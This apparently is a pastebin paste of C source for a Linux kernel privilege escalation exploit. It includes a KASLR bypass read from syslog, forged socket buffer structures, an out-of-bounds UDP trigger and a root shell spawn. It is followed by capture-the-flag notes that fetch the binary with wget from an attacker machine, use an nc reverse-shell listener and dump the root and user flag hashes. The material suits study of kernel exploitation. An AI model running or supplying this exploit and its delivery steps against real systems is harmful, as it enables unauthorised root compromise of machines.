- char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
- if (substr == NULL) {
- fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
- exit(EXIT_FAILURE);
- }
- int start = 0;
- int end = 0;
- for (start = 0; substr[start] != '-'; start++);
- for (end = start; substr[end] != '\n'; end++);
- const char* needle2 = "ffffff";
- substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
- if (substr == NULL) {
- fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
- exit(EXIT_FAILURE);
- }
- char* endptr = &substr[16];
- unsigned long r = strtoul(&substr[0], &endptr, 16);
- r &= 0xfffffffffff00000ul;
- r -= 0x1000000ul;
- return r;
- }
- unsigned long get_kernel_addr() {
- char* syslog;
- int size;
- mmap_syslog(&syslog, &size);
- /*if (strcmp("trusty", kernels[kernel].distro) == 0 &&
- strncmp("4.4.0", kernels[kernel].version, 5) == 0)
- return get_kernel_addr_trusty(syslog, size);
- if (strcmp("xenial", kernels[kernel].distro) == 0 &&
- strncmp("4.8.0", kernels[kernel].version, 5) == 0)*/
- return get_kernel_addr_xenial(syslog, size);
- printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
- exit(EXIT_FAILURE);
- }
- // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
- struct ubuf_info {
- uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
- uint64_t ctx; // void *
- uint64_t desc; // unsigned long
- };
- struct skb_shared_info {
- uint8_t nr_frags; // unsigned char
- uint8_t tx_flags; // __u8
- uint16_t gso_size; // unsigned short
- uint16_t gso_segs; // unsigned short
- uint16_t gso_type; // unsigned short
- uint64_t frag_list; // struct sk_buff *
- uint64_t hwtstamps; // struct skb_shared_hwtstamps
- uint32_t tskey; // u32
- uint32_t ip6_frag_id; // __be32
- uint32_t dataref; // atomic_t
- uint64_t destructor_arg; // void *
- uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
- };
- struct ubuf_info ui;
- void init_skb_buffer(char* buffer, unsigned long func) {
- struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
- memset(ssi, 0, sizeof(*ssi));
- ssi->tx_flags = 0xff;
- ssi->destructor_arg = (uint64_t)&ui;
- ssi->nr_frags = 0;
- ssi->frag_list = 0;
- ui.callback = func;
- }
- // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
- #define SHINFO_OFFSET 3164
- void oob_execute(unsigned long payload) {
- char buffer[4096];
- memset(&buffer[0], 0x42, 4096);
- init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
- int s = socket(PF_INET, SOCK_DGRAM, 0);
- if (s == -1) {
- perror("[-] socket()");
- exit(EXIT_FAILURE);
- }
- struct sockaddr_in addr;
- memset(&addr, 0, sizeof(addr));
- addr.sin_family = AF_INET;
- addr.sin_port = htons(8000);
- addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
- if (connect(s, (void*)&addr, sizeof(addr))) {
- perror("[-] connect()");
- exit(EXIT_FAILURE);
- }
- int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
- int rv = send(s, buffer, size, MSG_MORE);
- if (rv != size) {
- perror("[-] send()");
- exit(EXIT_FAILURE);
- }
- int val = 1;
- rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
- if (rv != 0) {
- perror("[-] setsockopt(SO_NO_CHECK)");
- exit(EXIT_FAILURE);
- }
- send(s, buffer, 1, 0);
- close(s);
- }
- // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
- #define CHUNK_SIZE 1024
- int read_file(const char* file, char* buffer, int max_length) {
- int f = open(file, O_RDONLY);
- if (f == -1)
- return -1;
- int bytes_read = 0;
- while (true) {
- int bytes_to_read = CHUNK_SIZE;
- if (bytes_to_read > max_length - bytes_read)
- bytes_to_read = max_length - bytes_read;
- int rv = read(f, &buffer[bytes_read], bytes_to_read);
- if (rv == -1)
- return -1;
- bytes_read += rv;
- if (rv == 0)
- return bytes_read;
- }
- }
- #define LSB_RELEASE_LENGTH 1024
- void get_distro_codename(char* output, int max_length) {
- char buffer[LSB_RELEASE_LENGTH];
- int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);
- if (length == -1) {
- perror("[-] open/read(/etc/lsb-release)");
- exit(EXIT_FAILURE);
- }
- const char *needle = "DISTRIB_CODENAME=";
- int needle_length = strlen(needle);
- char* found = memmem(&buffer[0], length, needle, needle_length);
- if (found == NULL) {
- printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
- exit(EXIT_FAILURE);
- }
- int i;
- for (i = 0; found[needle_length + i] != '\n'; i++) {
- assert(i < max_length);
- assert((found - &buffer[0]) + needle_length + i < length);
- output[i] = found[needle_length + i];
- }
- }
- void get_kernel_version(char* output, int max_length) {
- struct utsname u;
- int rv = uname(&u);
- if (rv != 0) {
- perror("[-] uname())");
- exit(EXIT_FAILURE);
- }
- assert(strlen(u.release) <= max_length);
- strcpy(&output[0], u.release);
- }
- #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
- #define DISTRO_CODENAME_LENGTH 32
- #define KERNEL_VERSION_LENGTH 32
- void detect_versions() {
- char codename[DISTRO_CODENAME_LENGTH];
- char version[KERNEL_VERSION_LENGTH];
- get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
- get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);
- int i;
- for (i = 0; i < ARRAY_SIZE(kernels); i++) {
- if (/*strcmp(&codename[0], kernels[i].distro) == 0 && */
- strcmp(&version[0], kernels[i].version) == 0) {
- printf("[.] kernel version '%s' detected\n", kernels[i].version);
- //kernel = i;
- return;
- }
- }
- printf("[-] kernel version not recognized\n");
- exit(EXIT_FAILURE);
- }
- #define PROC_CPUINFO_LENGTH 4096
- // 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
- int smap_smep_enabled() {
- char buffer[PROC_CPUINFO_LENGTH];
- int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH);
- if (length == -1) {
- perror("[-] open/read(/proc/cpuinfo)");
- exit(EXIT_FAILURE);
- }
- int rv = 0;
- char* found = memmem(&buffer[0], length, "smep", 4);
- if (found != NULL)
- rv += 1;
- found = memmem(&buffer[0], length, "smap", 4);
- if (found != NULL)
- rv += 2;
- return rv;
- }
- void check_smep_smap() {
- int rv = smap_smep_enabled();
- if (rv >= 2) {
- printf("[-] SMAP detected, no bypass available\n");
- exit(EXIT_FAILURE);
- }
- #if !ENABLE_SMEP_BYPASS
- if (rv >= 1) {
- printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
- exit(EXIT_FAILURE);
- }
- #endif
- }
- // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
- static bool write_file(const char* file, const char* what, ...) {
- char buf[1024];
- va_list args;
- va_start(args, what);
- vsnprintf(buf, sizeof(buf), what, args);
- va_end(args);
- buf[sizeof(buf) - 1] = 0;
- int len = strlen(buf);
- int fd = open(file, O_WRONLY | O_CLOEXEC);
- if (fd == -1)
- return false;
- if (write(fd, buf, len) != len) {
- close(fd);
- return false;
- }
- close(fd);
- return true;
- }
- void setup_sandbox() {
- int real_uid = getuid();
- int real_gid = getgid();
- if (unshare(CLONE_NEWUSER) != 0) {
- printf("[!] unprivileged user namespaces are not available\n");
- perror("[-] unshare(CLONE_NEWUSER)");
- exit(EXIT_FAILURE);
- }
- if (unshare(CLONE_NEWNET) != 0) {
- perror("[-] unshare(CLONE_NEWUSER)");
- exit(EXIT_FAILURE);
- }
- if (!write_file("/proc/self/setgroups", "deny")) {
- perror("[-] write_file(/proc/self/set_groups)");
- exit(EXIT_FAILURE);
- }
- if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
- perror("[-] write_file(/proc/self/uid_map)");
- exit(EXIT_FAILURE);
- }
- if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
- perror("[-] write_file(/proc/self/gid_map)");
- exit(EXIT_FAILURE);
- }
- cpu_set_t my_set;
- CPU_ZERO(&my_set);
- CPU_SET(0, &my_set);
- if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
- perror("[-] sched_setaffinity()");
- exit(EXIT_FAILURE);
- }
- if (system("/sbin/ifconfig lo mtu 1500") != 0) {
- perror("[-] system(/sbin/ifconfig lo mtu 1500)");
- exit(EXIT_FAILURE);
- }
- if (system("/sbin/ifconfig lo up") != 0) {
- perror("[-] system(/sbin/ifconfig lo up)");
- exit(EXIT_FAILURE);
- }
- }
- void exec_shell() {
- char* shell = "/bin/bash";
- char* args[] = {shell, "-i", NULL};
- execve(shell, args, NULL);
- }
- bool is_root() {
- // We can't simple check uid, since we're running inside a namespace
- // with uid set to 0. Try opening /etc/shadow instead.
- int fd = open("/etc/shadow", O_RDONLY);
- if (fd == -1)
- return false;
- close(fd);
- return true;
- }
- void check_root() {
- printf("[.] checking if we got root\n");
- if (!is_root()) {
- printf("[-] something went wrong =(\n");
- return;
- }
- printf("[+] got r00t ^_^\n");
- exec_shell();
- }
- int main(int argc, char** argv) {
- printf("[.] starting\n");
- //printf("[.] checking distro and kernel versions\n");
- //detect_versions();
- //
- printf("[~] done, versions looks good\n");
- printf("[.] checking SMEP and SMAP\n");
- check_smep_smap();
- printf("[~] done, looks good\n");
- printf("[.] setting up namespace sandbox\n");
- setup_sandbox();
- printf("[~] done, namespace sandbox set up\n");
- #if ENABLE_KASLR_BYPASS
- printf("[.] KASLR bypass enabled, getting kernel addr\n");
- KERNEL_BASE = get_kernel_addr();
- printf("[~] done, kernel text: %lx\n", KERNEL_BASE);
- #endif
- printf("[.] commit_creds: %lx\n", COMMIT_CREDS);
- printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
- unsigned long payload = (unsigned long)&get_root;
- #if ENABLE_SMEP_BYPASS
- printf("[.] SMEP bypass enabled, mmapping fake stack\n");
- mmap_stack();
- payload = XCHG_EAX_ESP_RET;
- printf("[~] done, fake stack mmapped\n");
- #endif
- printf("[.] executing payload %lx\n", payload);
- oob_execute(payload);
- printf("[~] done, should be root now\n");
- check_root();
- return 0;
- }
- gcc poc.c -o poc
- after need to transfer on server we need to transfer port through 80,443
- on server goto on /home/decoder/test/
- on your system python -m SimpleHTTPServer 80
- on server
- wget http://10.10.??.??:80/poc
- after than give permission chmod 777 poc
- than close the python server and server again login
- because we can't root with decoder user group we only need ftpuser
- because only decoder can write on test folder not ftpuser because of that we need to change
- ./shell
- nc -lvnp 80
- now u got shell
- cd /home/decoder/test/
- ./poc
- u got root
- root@nightmare:/root# cat root.txt
- cat root.txt
- a1604f74e9d1c201f7ddf3bf5b356f89
- root@nightmare:/root# cat /home/decoder/user.txt
- cat /home/decoder/user.txt
- d75ce743ecd84db14c759ee23d2cb1a5
- root@nightmare:/root#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement